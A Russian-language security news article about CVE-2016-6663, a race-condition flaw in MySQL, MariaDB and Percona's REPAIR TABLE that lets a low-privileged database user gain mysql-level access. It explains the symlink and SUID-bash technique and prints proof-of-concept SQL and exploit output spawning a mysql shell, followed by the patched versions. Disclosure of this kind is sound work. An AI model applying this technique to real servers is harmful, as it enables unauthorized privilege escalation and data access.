Раскрыта новая уязвимость в MySQL, которая позволяет обойти систему ограничения привилегий — HackZona.Ru

Давид Голански (Dawid Golunski) продолжил публикацию исследований безопасности MySQL. В сентябре им были опубликованы сведения об уязвимости в сервере MySQL, позволяющей повысить свои привилегии до пользователя root

Раскрыта новая уязвимость в MySQL, которая позволяет обойти систему ограничения привилегий

Давид Голански (Dawid Golunski) продолжил публикацию исследований безопасности MySQL. В сентябре им были опубликованы сведения об уязвимости в сервере MySQL, позволяющей повысить свои привилегии до пользователя root. Техника атаки была ограничена пользователями с правами FILE, но было сказано, что имеется метод обхода данного ограничения и атака может быть совершена любым непривилегированным пользователем СУБД. Спустя месяц Давид раскрыл информацию о новой уязвимости (CVE-2016-6663), позволяющей обойти систему ограничения привилегий MySQL, сообщает OpenNET.


Уязвимость затрагивает MySQL и производные продукты, такие как MariaDB и Percona Server, и позволяет локальному пользователю, имеющему доступ к СУБД с типовыми правами на выполнение операций CREATE, INSERT и SELECT, получить полномочия администратора СУБД (обычно пользователь mysql) и возможность записи и чтения любых файлов MySQL, в том числе конфигурационных файлов и БД других пользователей. В сочетании с ранее обнародованной уязвимостью CVE-2016-6662, новая проблема упрощает проведение атаки по получению прав root на сервере с MySQL.

Уязвимость основана на использовании состояния гонки при работе с таблицами, размещёнными в подконтрольных пользователю директориях. Пользователь с правами «CREATE table» может через параметр «DATA DIRECTORY» задать путь к каталогу, где будет сохранена создаваемая таблица. В том числе таблицу можно разместить в директории, которая принадлежит пользователю, но файлы MySQL в данной директории будут размещены под пользователем mysql:

[email protected]:~$ ls -ld /tmp/disktable/
   drwxrwxrwx 2 attacker attacker 4096 Oct 28 10:53 /tmp/disktable/

   mysql> CREATE TABLE poctab1 (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/disktable';

   [email protected]:~$ ls -l /tmp/disktable/
   -rw-rw---- 1 mysql mysql 0 Oct 28 10:53 poctab1.MYD

При выполнении команды «REPAIR TABLE», MySQL создаёт в той же директории временный файл, сохраняет параметры исходного файла таблицы, копирует данные и после завершения работы с временным файлом выполняет операции восстановления прав доступа и переименовывает временный файл в основной файл таблицы. Так как владельцем директории является атакующий и он имеет возможность манипулировать файлами, суть атаки сводится к подмене временного файла в промежуток после проверки параметров файла, но до выполнения chmod(). В итоге атакующий может подставить вместо временного файла символическую ссылку, указывающую на директорию /var/lib/mysql. На завершающей стадии работы «REPAIR TABLE» к ссылке на /var/lib/mysql будет применена операция chmod() с параметрами исходного файла таблицы пользователя, т.е. атакующий получит возможность установить произвольные права доступа на директорию /var/lib/mysql, изменив права на исходный файл со своей таблицей, например, установив на файл с таблицей права 777.

Через манипуляцию с битом SUID и его переносом на исполняемый файл, можно добиться выполнения произвольного кода в системе с правами mysql. Для этого на директорию пользователя следует выставить «sticky bit» и установить права drwxrwsrwx, после чего создание таблицы в данной директории приведёт к образованию файла с правами -rw-rw----, владельцем mysql и группой как у атакующего. Доступ членов группы на запись даёт возможность заменить содержимое файла таблицы на /bin/bash, после чего можно использовать вышеописанное состояние гонки для переноса на файл таблицы suid-бита и прав на запуск. В итоге получим исполняемый файл с копией bash и suid-битом для запуска с правами mysql.

[email protected]:~/mysql-exploit$ ./mysql-privesc-race attacker pocsql localhost pocdb

   [+] Starting the exploit as: 
   uid=1001(attacker) gid=1001(attacker) groups=1001(attacker)

   [+] Connecting to the database `pocdb` as [email protected]

   [+] Creating exploit temp directory /tmp/mysql_privesc_exploit

   [+] Creating mysql tables 

   DROP TABLE IF EXISTS exploit_table 
   DROP TABLE IF EXISTS mysql_suid_shell 
   CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' 
   CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' 

   [+] Copying bash into the mysql_suid_shell table. 
       After the exploitation the following file/table will be assigned SUID and executable bits : 
   -rw-rw---- 1 mysql attacker 1037528 Nov  1 02:33 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD

   [+] Entering the race loop... Hang in there...
   [+] Bingo! Race won (took 5 tries) ! Check out the mysql SUID shell: 

   -rwsrwxrwx 1 mysql attacker 1037528 Nov  1 02:33 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD

   [+] Spawning the mysql SUID shell now... 
    Remember that from there you can gain root with vuln CVE-2016-6662 or CVE-2016-6664 :)

   mysql_suid_shell.MYD-4.3$ whoami
   mysql

   mysql_suid_shell.MYD-4.3$ id
   uid=1001(attacker) gid=1001(attacker) euid=107(mysql) groups=1001(attacker)

   mysql_suid_shell.MYD-4.3$ ls -l /var/lib/mysql/mysql/user.*
   -rw-rw---- 1 mysql mysql 2879 Oct 29 14:23 /var/lib/mysql/mysql/user.frm
   -rw-rw---- 1 mysql mysql  168 Oct 29 22:35 /var/lib/mysql/mysql/user.MYD
   -rw-rw---- 1 mysql mysql 4096 Oct 30 00:11 /var/lib/mysql/mysql/user.MYI

Уязвимость устранена в выпусках MySQL 5.5.52, 5.6.33 и 5.7.15, а также в MariaDB 5.5.52, 10.1.18 и 10.0.28, в Percona Server 5.5.51-38.2, 5.6.32-78-1 и 5.7.14-8, в Percona XtraDB Cluster 5.6.32-25.17, 5.7.14-26.17 и 5.5.41-37.0. Так как производители были заведомо информированы о проблеме, обновления пакетов уже выпущены для Debian, RHEL, Ubuntu, FreeBSD, Ubuntu и SUSE.

Нравится
Не нравится
01:11

Комментарии

Нет комментариев. Ваш будет первым!